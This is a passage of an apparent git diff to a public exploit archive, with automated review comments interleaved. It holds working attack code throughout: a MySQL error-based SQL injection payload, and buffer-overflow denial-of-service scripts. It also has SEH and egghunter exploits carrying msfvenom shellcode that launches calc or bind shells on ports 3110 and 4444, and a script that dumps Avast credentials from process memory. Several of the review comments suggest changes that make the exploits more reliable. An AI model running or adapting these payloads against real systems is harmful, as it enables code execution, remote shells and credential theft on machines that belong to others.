+COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x +FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' +--54a535315dda429db2f07895827ff1c6 +Content-Disposition: form-data; name="password" + +--54a535315dda429db2f07895827ff1c6-- \ No newline at end of file diff --git a/exploits/windows/dos/46338.py b/exploits/windows/dos/46338.py new file mode 100755 index 000000000..5eaa9744d --- /dev/null +++ b/exploits/windows/dos/46338.py @@ -0,0 +1,32 @@ +# Exploit Title: FutureDj Pro Local Dos Exploit +# Date: 07.02.2019 +# Vendor Homepage: https://www.xylio.com +# Software Link: https://www.xylio.com/future-dj-pro-a-new-level-of-mixing-perfection/ +# Exploit Author: Achilles +# Tested Version: 1.7.2.0 32bit +# Tested on: Windows 7 SP1 Ultimate + +# 1.- Run python code : FutureDj Pro.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open future.dj.exe +# 4.- In the New Window click start Free Trial and then 'Click here to Buy' +# 5.- And then 'i already bought it' +# 6.- Paste the Content of EVIL.txt into the 'Unlock key' Name field. +# 7.- Click 'OK' +# 8.- Click 'OK' +# 9.- Click 'Exit' +# 10.- And you will see a crash + + +#!/usr/bin/env python + +buffer = "\x41" * 5000 + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/46343.py b/exploits/windows/dos/46343.py new file mode 100755 index 000000000..6f98fb19e --- /dev/null +++ b/exploits/windows/dos/46343.py 
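Review bot: The entry never says what a successful injection looks like, so a reader has no oracle; the pattern is the MySQL duplicate-key technique — `FLOOR(RAND(0)*2)` grouped in a subquery — and the `CONCAT(CHAR(95),...,0x3a,...)` marker is expected to surface in the login response as a duplicate-entry error containing that marker, which the write-up should state under `# POC - SQL` together with the fact that the request is sent to the login handler without any session. Also `# Software Link: hhttps://sourceforge.net/...` has a doubled `h`, and the URL-encoded `Attack Pattern` and the raw multipart body differ only by encoding, which deserves one sentence so nobody assumes two distinct payloads.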
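Review bot: The `#!/usr/bin/env python` line sits after the header comments, so it is not a shebang and the script cannot be run directly; move it to line 1. The bare `except:` around the file write prints only `File cannot be created` and hides the real error (permissions, path), so catch `except IOError as e:` and print `e`. The write-up also gives no crash detail — no faulting module, exception code or register state — and the trigger is the local user pasting 5000 bytes into the unlock-key field, so the entry should say whether this is an unhandled exception or an overwrite worth pursuing; as written it crosses no privilege boundary.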
@@ -0,0 +1,22 @@ +# -*- coding: utf-8 -*- +# Exploit Title: NordVPN 6.19.6 - Denial of Service (PoC) +# Date: 07/02/2019 +# Author: Alejandra Sánchez +# Vendor Homepage: https://nordvpn.com/ +# Software Link: https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe +# Version: 6.19.6 +# Tested on: Windows 10 + +# Proof of Concept: +# 1.- Run the python script, it will create a new file "PoC.txt" +# 2.- Copy the text from the generated PoC.txt file to clipboard +# 3.- Open NordVPN.exe +# 3.- Paste clipboard in 'E-mail' field +# 4.- Write '1234' in 'Password' field +# 5.- Clic on button -> Sign In +# 6.- Crashed + +buffer = "\x41" * 100000 +f = open ("PoC.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46346.py b/exploits/windows/dos/46346.py new file mode 100755 index 000000000..f5c18713d --- /dev/null +++ b/exploits/windows/dos/46346.py 
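Review bot: The proof of concept gives no crash context — no exception type, faulting module or whether it was a handled .NET error dialog versus an access violation — so a reader cannot tell whether pasting 100,000 bytes into the e-mail field is memory corruption or an unguarded length check; add the Event Viewer or debugger output to the header. Step numbering repeats `3.`; renumber. The script also writes the file with no error handling and no shebang, which matches the other DoS entries in this batch but still deserves a `#!/usr/bin/env python` first line and an `except IOError as e:` around the write.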
@@ -0,0 +1,44 @@ +# Exploit Title: River Past Video Cleaner Buffer Overflow (SEH) +# Date: 9-2-2019 +# Exploit Author: crash_manucoot +# Contact: twitter.com/crash_manucoot +# Software Link: https://river-past-video-cleaner.softonic.com/ +# Version: 7.6.3 +# Tested on: Windows 10 Pro x64 SPANISH +# Category: Windows Local Exploit +# How to use:open the program go to file-options paste the contents of open.txt in the Lame_enc.dll field and the calculator will open + + + + +buff = "A" * 280 +nseh = "\xeb\x06\x90\x90" +seh = "\x3a\x91\x01\x10" +nop = "\x90" * 16 + +shellcode = "" +shellcode += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d" +shellcode += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5" +shellcode += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde" +shellcode += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb" +shellcode += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32" +shellcode += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84" +shellcode += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27" +shellcode += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3" +shellcode += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5" +shellcode += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8" +shellcode += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3" +shellcode += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78" +shellcode += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15" +shellcode += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a" +shellcode += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05" +shellcode += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b" +shellcode += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26" +shellcode += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82" +shellcode += "\x8e\x2a\x79\xdb" + +evil = buff + nseh + seh + nop + shellcode + +file = open('open.txt','w+') +file.write(evil) +file.close() \ No newline at end of file 
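Review bot: `seh = "\x3a\x91\x01\x10"` has no comment saying which module the pop/pop/ret at 0x1001913a comes from or whether that module is SafeSEH- and ASLR-free, while the companion CamDo exploit in this batch annotates its address with `#pop pop ret rvddshow2.dll`; record it, e.g. `seh = "\x3a\x91\x01\x10"  # pop pop ret 0x1001913a in <module>`, together with the msfvenom command and bad characters used for the calc shellcode, so the payload can be regenerated. The entry is filed under windows/dos but the description says the calculator opens — that is code execution, not a denial of service — so the category or the title should agree.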
diff --git a/exploits/windows/local/46334.py b/exploits/windows/local/46334.py new file mode 100755 index 000000000..1d5fdc610 --- /dev/null +++ b/exploits/windows/local/46334.py 
@@ -0,0 +1,119 @@ +#!/usr/bin/env python + +#------------------------------------------------------------------------------------------------------------------------------------# +# Exploit: IP-Tools 2.5 - Local Buffer Overflow(EggHunter) # +# Date: 2019-02-06 # +# Author: Juan Prescotto # +# Tested Against: Win7 Pro SP1 64 bit # +# Software Download #1: https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe # +# Software Download #2: https://www.exploit-db.com/apps/4a83348f18a18ba34f9747648b550307-ip-tools.exe # +# Version: 2.5 # +# Special Thanks to my wife for allowing me spend countless hours on this passion of mine # +# Steps : Open the APP > SNMP Scanner > paste in contents from the egg.txt into "From Addr" > "Start" > Click "Options" > # +# "Host Monitor" --> "Logging" > paste in contents from the egghunter.txt into "Log to file" > OK > Bind Shell - Port 4444 # +#------------------------------------------------------------------------------------------------------------------------------------# +# Good Characers: alphanumeric and printable special characters # +# EIP Offset Overwrite ("Log to file" field): 264 # +# Non-Participating Modules: ip_tools.exe # +#------------------------------------------------------------------------------------------------------------------------------------# +# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite --> # +# Stack Adjust (0x40) / RETN --> Egghunter Shellcode --> Egg Shellcode # +#------------------------------------------------------------------------------------------------------------------------------------# + + +##################EGG Shellcode Generation################################# + +#msfvenom -p windows/shell_bind_tcp LPORT=4444 BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg +#710 bytes + 8 bytes for egg identifier + +egg = "w00tw00t" +egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +egg += 
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +egg += "\x69\x6c\x4b\x58\x6d\x52\x35\x50\x35\x50\x75\x50\x63" +egg += "\x50\x4f\x79\x4d\x35\x36\x51\x4b\x70\x71\x74\x6e\x6b" +egg += "\x36\x30\x46\x50\x6e\x6b\x66\x32\x44\x4c\x6c\x4b\x63" +egg += "\x62\x54\x54\x4c\x4b\x72\x52\x65\x78\x34\x4f\x68\x37" +egg += "\x52\x6a\x34\x66\x50\x31\x59\x6f\x4c\x6c\x57\x4c\x53" +egg += "\x51\x71\x6c\x67\x72\x54\x6c\x31\x30\x5a\x61\x58\x4f" +egg += "\x34\x4d\x56\x61\x4f\x37\x68\x62\x4a\x52\x36\x32\x66" +egg += "\x37\x4e\x6b\x36\x32\x42\x30\x6c\x4b\x50\x4a\x35\x6c" +egg += "\x4c\x4b\x72\x6c\x44\x51\x44\x38\x78\x63\x32\x68\x55" +egg += "\x51\x78\x51\x43\x61\x6e\x6b\x76\x39\x45\x70\x75\x51" +egg += "\x59\x43\x6e\x6b\x33\x79\x42\x38\x4d\x33\x65\x6a\x71" +egg += "\x59\x6e\x6b\x36\x54\x4e\x6b\x36\x61\x78\x56\x46\x51" +egg += "\x49\x6f\x4e\x4c\x79\x51\x7a\x6f\x66\x6d\x35\x51\x48" +egg += "\x47\x36\x58\x79\x70\x30\x75\x39\x66\x33\x33\x33\x4d" +egg += "\x58\x78\x57\x4b\x73\x4d\x56\x44\x53\x45\x48\x64\x61" +egg += "\x48\x4e\x6b\x72\x78\x67\x54\x57\x71\x69\x43\x73\x56" +egg += "\x6e\x6b\x54\x4c\x50\x4b\x6c\x4b\x53\x68\x37\x6c\x73" +egg += "\x31\x58\x53\x4c\x4b\x74\x44\x4e\x6b\x67\x71\x48\x50" +egg += "\x4f\x79\x70\x44\x36\x44\x76\x44\x51\x4b\x71\x4b\x55" +egg += "\x31\x46\x39\x32\x7a\x63\x61\x4b\x4f\x6b\x50\x53\x6f" +egg += "\x61\x4f\x61\x4a\x4c\x4b\x62\x32\x6a\x4b\x6e\x6d\x31" +egg += "\x4d\x63\x58\x75\x63\x54\x72\x35\x50\x45\x50\x33\x58" +egg += "\x52\x57\x33\x43\x36\x52\x73\x6f\x62\x74\x33\x58\x30" +egg += "\x4c\x31\x67\x54\x66\x63\x37\x69\x6f\x6e\x35\x78\x38" +egg += "\x4e\x70\x63\x31\x37\x70\x43\x30\x35\x79\x4f\x34\x32" +egg += "\x74\x46\x30\x51\x78\x36\x49\x4f\x70\x52\x4b\x63\x30" +egg += "\x59\x6f\x38\x55\x73\x5a\x43\x38\x70\x59\x36\x30\x49" +egg += "\x72\x59\x6d\x57\x30\x52\x70\x47\x30\x50\x50\x51\x78" +egg += 
"\x5a\x4a\x44\x4f\x6b\x6f\x79\x70\x39\x6f\x39\x45\x4f" +egg += "\x67\x65\x38\x44\x42\x77\x70\x64\x51\x71\x4c\x6c\x49" +egg += "\x6d\x36\x32\x4a\x72\x30\x63\x66\x56\x37\x30\x68\x68" +egg += "\x42\x4b\x6b\x64\x77\x61\x77\x59\x6f\x39\x45\x70\x57" +egg += "\x35\x38\x6d\x67\x68\x69\x65\x68\x59\x6f\x6b\x4f\x4a" +egg += "\x75\x36\x37\x75\x38\x34\x34\x58\x6c\x57\x4b\x4d\x31" +egg += "\x49\x6f\x4a\x75\x51\x47\x4e\x77\x55\x38\x32\x55\x52" +egg += "\x4e\x70\x4d\x43\x51\x39\x6f\x6e\x35\x51\x78\x70\x63" +egg += "\x32\x4d\x33\x54\x77\x70\x6e\x69\x68\x63\x30\x57\x63" +egg += "\x67\x30\x57\x55\x61\x6b\x46\x71\x7a\x56\x72\x31\x49" +egg += "\x62\x76\x6d\x32\x79\x6d\x55\x36\x6a\x67\x62\x64\x51" +egg += "\x34\x67\x4c\x73\x31\x33\x31\x6e\x6d\x71\x54\x44\x64" +egg += "\x66\x70\x39\x56\x43\x30\x77\x34\x43\x64\x76\x30\x72" +egg += "\x76\x61\x46\x50\x56\x32\x66\x30\x56\x62\x6e\x72\x76" +egg += "\x53\x66\x61\x43\x52\x76\x62\x48\x44\x39\x78\x4c\x45" +egg += "\x6f\x4f\x76\x69\x6f\x68\x55\x6b\x39\x39\x70\x42\x6e" +egg += "\x66\x36\x50\x46\x69\x6f\x36\x50\x75\x38\x33\x38\x4b" +egg += "\x37\x67\x6d\x73\x50\x69\x6f\x6a\x75\x6d\x6b\x58\x70" +egg += "\x4d\x65\x79\x32\x76\x36\x75\x38\x4e\x46\x6f\x65\x6d" +egg += "\x6d\x6f\x6d\x69\x6f\x79\x45\x35\x6c\x73\x36\x31\x6c" +egg += "\x44\x4a\x6b\x30\x79\x6b\x4d\x30\x73\x45\x74\x45\x6f" +egg += "\x4b\x30\x47\x32\x33\x31\x62\x72\x4f\x52\x4a\x37\x70" +egg += "\x72\x73\x49\x6f\x7a\x75\x41\x41" + +f = open ("egg.txt", "w") +f.write(egg) +f.close() + +##################EGG Hunter Shellcode Generation################################# + +#encode egghunter code (looking for w00tw00t) (wow64 egghunter code produced by mona) into only alpha characters; egghunter shellcode proceeded by xor edx,edx (start egg hunting at 0x00000000) +#echo -ne "\x33\xd2\x31\xdb\x53\x53\x53\x53\xb3\xc0\x66\x81\xca\xff\x0f\x42\x52\x6a\x26\x58\x33\xc9\x8b\xd4\x64\xff\x13\x5e\x5a\x3c\x05\x74\xe9\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xe4\xaf\x75\xe1\xff\xe7" | msfvenom BufferRegister=EDI -e 
x86/alpha_mixed -f python -a x86 --platform windows -v egghunter -p - +#150 bytes + +egghunter = "" +egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58" +egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" +egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +egghunter += "\x42\x75\x4a\x49\x35\x63\x4b\x62\x30\x31\x4b\x6b" +egghunter += "\x52\x73\x56\x33\x46\x33\x46\x33\x58\x33\x49\x50" +egghunter += "\x45\x36\x6f\x71\x6a\x6a\x6b\x4f\x46\x6f\x31\x52" +egghunter += "\x66\x32\x72\x4a\x55\x76\x32\x78\x70\x33\x38\x49" +egghunter += "\x6e\x6b\x5a\x74\x55\x34\x79\x6f\x37\x63\x53\x6e" +egghunter += "\x62\x7a\x55\x6c\x66\x65\x51\x64\x4d\x39\x48\x38" +egghunter += "\x30\x77\x50\x30\x70\x30\x74\x34\x4e\x6b\x58\x7a" +egghunter += "\x6c\x6f\x51\x65\x4a\x44\x4e\x4f\x42\x55\x79\x71" +egghunter += "\x69\x6f\x6a\x47\x41\x41" + +#0x00473259 : {pivot 64 / 0x40}[IP_TOOLS.EXE] + +eip = "\x59\x32\x47\x00" + +buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip + +f = open ("egghunter.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/46335.py b/exploits/windows/local/46335.py new file mode 100755 index 000000000..c81b585ab --- /dev/null +++ b/exploits/windows/local/46335.py 
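Review bot: `eip = "\x59\x32\x47\x00"` ends in a null byte although the header states the good characters are alphanumeric and printable, so the address only works because it is the last thing in the buffer and the terminator is tolerated there; say so, e.g. `# 0x00473259 pivot - trailing \x00 is acceptable only because EIP is the final 4 bytes of the buffer`, otherwise anyone appending data after `eip` will not understand why it breaks. The egghunter comment already notes it is the WoW64 variant (`mov bl,0xC0` / `call fs:[ebx]`) starting at `xor edx,edx`, which is why the exploit is tied to the 64-bit Win7 in the header; one sentence that a 32-bit target presumably needs the classic syscall-based hunter would save a failed reproduction. The `w00tw00t` payload is a bind shell on 4444, so a note that the target's host firewall must admit that port belongs in the steps.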
@@ -0,0 +1,67 @@
+# Exploit Title: River Past CamDo SEH Local Exploit
+# Date: 07.02.2019
+# Vendor Homepage:www.riverpast.com
+# Software Link: https://en.softonic.com/download/river-past-cam-do/windows/post-download?sl=1
+# Exploit Author: Achilles
+# Tested Version: 3.7.6
+# Tested on: Windows XP SP3 EN
+
+# 1.- Run python code : CamDo.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open CamDo.exe and click on the 'Options' Inside fhe 'File' Menu.
+# 4.- Paste the Content of EVIL.txt into the 'Lame_enc.dll' name field.
+# 5.- Click 'OK' and you will have a bind shell port 3110.
+
+
+#!/usr/bin/env python
+import struct
+
+buffer = "\x41" * 280
+NSEH = "\xeb\x06\x90\x90" #jmp short 6
+SEH = struct.pack('<L',0x10010b0b) #pop pop ret rvddshow2.dll
+nops = "\x90" * 20
+
+#badchar \x00\x0a\x0d\x2f\
+#msfvenom -p windows/shell_bind_tcp LPORT=3110 -a x86 -b '\x00\x0a\x0d\x2f' -f python
+
+shellcode = ("\xb8\x9c\x94\x39\x34\xdb\xda\xd9\x74\x24\xf4\x5a\x33"
+"\xc9\xb1\x53\x31\x42\x12\x03\x42\x12\x83\x5e\x90\xdb"
+"\xc1\xa2\x71\x99\x2a\x5a\x82\xfe\xa3\xbf\xb3\x3e\xd7"
+"\xb4\xe4\x8e\x93\x98\x08\x64\xf1\x08\x9a\x08\xde\x3f"
+"\x2b\xa6\x38\x0e\xac\x9b\x79\x11\x2e\xe6\xad\xf1\x0f"
+"\x29\xa0\xf0\x48\x54\x49\xa0\x01\x12\xfc\x54\x25\x6e"
+"\x3d\xdf\x75\x7e\x45\x3c\xcd\x81\x64\x93\x45\xd8\xa6"
+"\x12\x89\x50\xef\x0c\xce\x5d\xb9\xa7\x24\x29\x38\x61"
+"\x75\xd2\x97\x4c\xb9\x21\xe9\x89\x7e\xda\x9c\xe3\x7c"
+"\x67\xa7\x30\xfe\xb3\x22\xa2\x58\x37\x94\x0e\x58\x94"
+"\x43\xc5\x56\x51\x07\x81\x7a\x64\xc4\xba\x87\xed\xeb"
+"\x6c\x0e\xb5\xcf\xa8\x4a\x6d\x71\xe9\x36\xc0\x8e\xe9"
+"\x98\xbd\x2a\x62\x34\xa9\x46\x29\x51\x1e\x6b\xd1\xa1"
+"\x08\xfc\xa2\x93\x97\x56\x2c\x98\x50\x71\xab\xdf\x4a"
+"\xc5\x23\x1e\x75\x36\x6a\xe5\x21\x66\x04\xcc\x49\xed"
+"\xd4\xf1\x9f\x98\xdc\x54\x70\xbf\x21\x26\x20\x7f\x89"
+"\xcf\x2a\x70\xf6\xf0\x54\x5a\x9f\x99\xa8\x65\x93\x7f"
+"\x24\x83\xc1\x6f\x60\x1b\x7d\x52\x57\x94\x1a\xad\xbd"
+"\x8c\x8c\xe6\xd7\x0b\xb3\xf6\xfd\x3b\x23\x7d\x12\xf8"
+"\x52\x82\x3f\xa8\x03\x15\xb5\x39\x66\x87\xca\x13\x10"
+"\x24\x58\xf8\xe0\x23\x41\x57\xb7\x64\xb7\xae\x5d\x99"
+"\xee\x18\x43\x60\x76\x62\xc7\xbf\x4b\x6d\xc6\x32\xf7"
+"\x49\xd8\x8a\xf8\xd5\x8c\x42\xaf\x83\x7a\x25\x19\x62"
+"\xd4\xff\xf6\x2c\xb0\x86\x34\xef\xc6\x86\x10\x99\x26"
+"\x36\xcd\xdc\x59\xf7\x99\xe8\x22\xe5\x39\x16\xf9\xad"
+"\x4a\x5d\xa3\x84\xc2\x38\x36\x95\x8e\xba\xed\xda\xb6"
+"\x38\x07\xa3\x4c\x20\x62\xa6\x09\xe6\x9f\xda\x02\x83"
+"\x9f\x49\x22\x86")
+
+
+payload = buffer + NSEH + SEH + nops + shellcode
+
+
+try:
+ f=open("Evil.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/46345.py b/exploits/windows/local/46345.py
new file mode 100755
index 000000000..d62e36bf7
--- /dev/null
+++ b/exploits/windows/local/46345.py
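Review bot: The bare `except:` at the end of the new file hides why the write failed and also catches KeyboardInterrupt; narrowing it to `except IOError as e:` and including `e` in the printed message keeps the failure diagnosable, and opening the file with `with open("Evil.txt", "w") as f:` would close the handle even when `f.write(payload)` raises, which the `f.close()` placed after the write does not guarantee. The `#!/usr/bin/env python` line sits after fifteen lines of header comments, so it is an ordinary comment rather than an interpreter directive and the file is not directly runnable despite its 100755 mode; it belongs on line 1. The usage notes in the header refer to `EVIL.txt` while the code writes `Evil.txt`, which only lines up on a case-insensitive filesystem.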
@@ -0,0 +1,49 @@
+# Exploit Title: Avast Anti-Virus Local Credentials Disclosure < 19.1.2360
+# Date: 01/18/2019
+# Exploit Author: Nathu Nandwani
+# Website: http://nandtech.co/
+# Version: before 19.1.2360 (build 19.1.4142.0)
+# Tested on: Windows 10 x64
+# CVE: CVE-2018-12572
+# Based on LiquidWorm's and Yakir Wizman's proof of concepts
+
+from winappdbg import Debug, Process
+
+debug = Debug()
+processname = "AvastUI.exe"
+pid = 0
+mem_contents = []
+
+email = ""
+password = ""
+
+try:
+ debug.system.scan_processes()
+ for (process, process_name) in debug.system.find_processes_by_filename(processname):
+ pid = process.get_pid()
+ if pid is not 0:
+ print ("AvastUI PID: " + str(pid))
+ process = Process(pid)
+ for i in process.search_regexp('"password":"'):
+ mem_contents.append(process.read(i[0], 200))
+ print "Dump: "
+ print process.read(i[0], 200)
+ for i in mem_contents:
+ password = i.split(",")[0]
+ for i in process.search_regexp('"email":"'):
+ mem_contents.append(process.read(i[0], 200))
+ print "Dump: "
+ print process.read(i[0], 200)
+ for i in mem_contents:
+ email = i.split(",")[0]
+ if email != "" and password != "":
+ print ""
+ print "Found Credentials from Memory!"
+ print email
+ print password
+ else:
+ print "No credentials found!"
+ else:
+ print "Avast not running!"
+finally:
+ debug.stop()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index bd1319547..6e00f8f7b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
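Review bot: `mem_contents` is reused across the two searches, so the second `for i in mem_contents:` loop assigns `email` from the last element of the combined list; when no `"email":"` match is found but a password was, `email` ends up holding the password dump and the `email != "" and password != ""` check reports credentials as found. Keeping two lists (`password_hits` and `email_hits`) or clearing the list between the searches fixes this. `if pid is not 0:` tests identity rather than value and only works because CPython interns small integers; it should read `if pid != 0:`. Rebinding the loop variable with `process = Process(pid)` inside the `for (process, process_name)` loop is confusing even if harmless, and the two `print process.read(i[0], 200)` lines write 200 bytes of raw process memory, plaintext secret included, to stdout unredacted.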
@@ -2038,7 +2038,7 @@ id,file,description,date,author,type,platform,port
 17842,exploits/windows/dos/17842.txt,"progea movicon / powerhmi 11.2.1085 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",dos,windows,
 17843,exploits/windows/dos/17843.txt,"Rockwell RSLogix 19 - Denial of Service",2011-09-14,"Luigi Auriemma",dos,windows,
 17844,exploits/windows/dos/17844.txt,"Measuresoft ScadaPro 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",dos,windows,
-17856,exploits/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (SEH) (PoC)",2011-09-18,loneferret,dos,windows,21
+17856,exploits/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflows (PoC) (SEH)",2011-09-18,loneferret,dos,windows,21
 17878,exploits/windows/dos/17878.txt,"EViews 7.0.0.1 (aka 7.2) - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",dos,windows,
 17879,exploits/windows/dos/17879.txt,"MetaServer RT 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",dos,windows,
 17885,exploits/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",dos,windows,
@@ -4151,7 +4151,7 @@ id,file,description,date,author,type,platform,port
 32860,exploits/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 - Duplicate URI Request Denial of Service",2009-03-31,"SCS team",dos,java,
 32865,exploits/multiple/dos/32865.py,"WhatsApp < 2.11.7 - Remote Crash",2014-04-14,"Jaime Sánchez",dos,multiple,
 32881,exploits/windows/dos/32881.py,"QtWeb Browser 2.0 - '.HTML' File Remote Denial of Service",2009-04-01,LiquidWorm,dos,windows,
-32899,exploits/windows/dos/32899.py,"Jzip - Buffer Overflow (Denial of Service) (SEH Unicode)",2014-04-16,"motaz reda",dos,windows,
+32899,exploits/windows/dos/32899.py,"Jzip - Buffer Overflow (PoC) (SEH Unicode)",2014-04-16,"motaz reda",dos,windows,
 32902,exploits/windows/dos/32902.py,"Microsoft Internet Explorer 8 - File Download Denial of Service",2009-04-11,"Nam Nguyen",dos,windows,
 32926,exploits/linux/dos/32926.c,"Linux Kernel - 'group_info' refcounter Overflow Memory Corruption",2014-04-18,"Thomas Pollet",dos,linux,
 32939,exploits/windows/dos/32939.txt,"Trend Micro OfficeScan 8.0 Client - Denial of Service",2009-04-21,"Juan Pablo Lopez Yacubian",dos,windows,
@@ -4442,8 +4442,8 @@ id,file,description,date,author,type,platform,port
 35489,exploits/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",dos,multiple,
 35502,exploits/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,dos,windows,
 35507,exploits/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,dos,windows,
-35530,exploits/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (Denial of Service) (SEH) (PoC)",2014-12-15,s-dz,dos,windows,
-35531,exploits/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (Denial of Service) (SEH) (PoC)",2014-12-15,s-dz,dos,windows,
+35530,exploits/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (PoC) (SEH Overwrite)",2014-12-15,s-dz,dos,windows,
+35531,exploits/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (PoC) (SEH Overwrite)",2014-12-15,s-dz,dos,windows,
 35532,exploits/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service",2014-12-15,s-dz,dos,windows,
 35539,exploits/php/dos/35539.txt,"phpMyAdmin 4.0.x/4.1.x/4.2.x - Denial of Service",2014-12-15,"Javer Nieto & Andres Rojas",dos,php,
 35552,exploits/windows/dos/35552.py,"MoviePlay 4.82 - '.avi' Buffer Overflow",2011-03-31,^Xecuti0N3r,dos,windows,
@@ -5025,7 +5025,7 @@ id,file,description,date,author,type,platform,port
 39466,exploits/multiple/dos/39466.txt,"Adobe Flash - H264 File Stack Corruption",2016-02-17,"Google Security Research",dos,multiple,
 39467,exploits/multiple/dos/39467.txt,"Adobe Flash - BitmapData.drawWithQuality Heap Overflow",2016-02-17,"Google Security Research",dos,multiple,
 39470,exploits/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8.0 - 'HELP' Remote Denial of Service",2016-02-19,"Pawan Lal",dos,windows,
-39471,exploits/windows/dos/39471.txt,"STIMS Buffer 1.1.20 - Buffer Overflow (Denial of Service) (SEH) (PoC)",2016-02-19,"Shantanu Khandelwal",dos,windows,
+39471,exploits/windows/dos/39471.txt,"STIMS Buffer 1.1.20 - Buffer Overflow (PoC) (SEH Overwrite)",2016-02-19,"Shantanu Khandelwal",dos,windows,
 39472,exploits/windows/dos/39472.txt,"STIMS Cutter 1.1.3.20 - Buffer Overflow (Denial of Service) (PoC)",2016-02-19,"Shantanu Khandelwal",dos,windows,
 39475,exploits/windows/dos/39475.py,"QuickHeal 16.00 - 'webssx.sys' Driver Denial of Service",2016-02-19,"Fitzl Csaba",dos,windows,
 39476,exploits/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",dos,multiple,
@@ -5064,7 +5064,7 @@ id,file,description,date,author,type,platform,port
 39551,exploits/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,dos,multiple,
 39555,exploits/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",dos,linux,
 39556,exploits/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",dos,linux,
